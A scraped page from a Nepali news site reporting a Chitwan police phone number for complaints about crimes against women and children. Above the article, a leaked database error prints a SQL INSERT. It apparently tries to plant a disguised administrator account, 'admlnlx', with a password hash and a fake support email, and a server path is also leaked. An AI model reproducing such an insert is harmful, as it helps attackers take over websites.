WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bpipqm9lnDQPcCt3qb3RQH0ThBuAh0.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 03:33:40', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
महिला तथा बालबालिका सम्बन्धि उजरी दिनु छ ? यो नम्बरमा फोन गर्नुस् – Gaule Khabar

महिला तथा बालबालिका सम्बन्धि उजरी दिनु छ ? यो नम्बरमा फोन गर्नुस्

महिला तथा बालबालिका सम्बन्धि उजरी दिनु छ ? यो नम्बरमा फोन गर्नुस्

चितवन, मंसिर २०–
महिला तथा बालबालिका सम्बन्धि धेरै घटनाहरु गुपचुप नै हुन गरेका छन् । सहज रुपमा घटना बारे जानकारी गराउन समस्या भएकाले धेरै जसो घटना बाहिर आउँदैन । अब भने जिल्ला प्रहरी कार्यालय चितवनले यस्तो घटना बारे जानकारी गराउन परेमा सिधै मोवाईल नम्बरमा सम्पर्क गर्न सक्ने व्यवस्था मिलाएको छ ।

महिला तथा बालबालिका सम्बन्धि घटनाहरुको तत्काल उजुरी तथा सुनुवाई सम्बन्धमा सम्बन्धित पीडित तथा सहयोगी व्यक्ति÷संघसंस्था समेतले सिधा सम्पर्क गरी सूचना दिन कठिनाई रहेको भन्ने जनगुनासो सुनिएपछि यस्तो सहज व्यवस्था गरिएको प्रवक्ता एवंम प्रहरी नायव उपरीक्षक दीपक श्रेष्ठले जानकारी दिनुभयो । उहाँले त्यस्ता घटनाहरुको तत्कालै सुचनाको लागि ९८५५०८२७४४ नम्बरको मोवाईल फोनको व्यबस्था गरिएको जानकारी दिनुभयो । यस नम्बरमा तत्कालै घटना बारे जानकारी दिए प्रहरीलाई समेत सहज हुने उहाँको भनाई छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका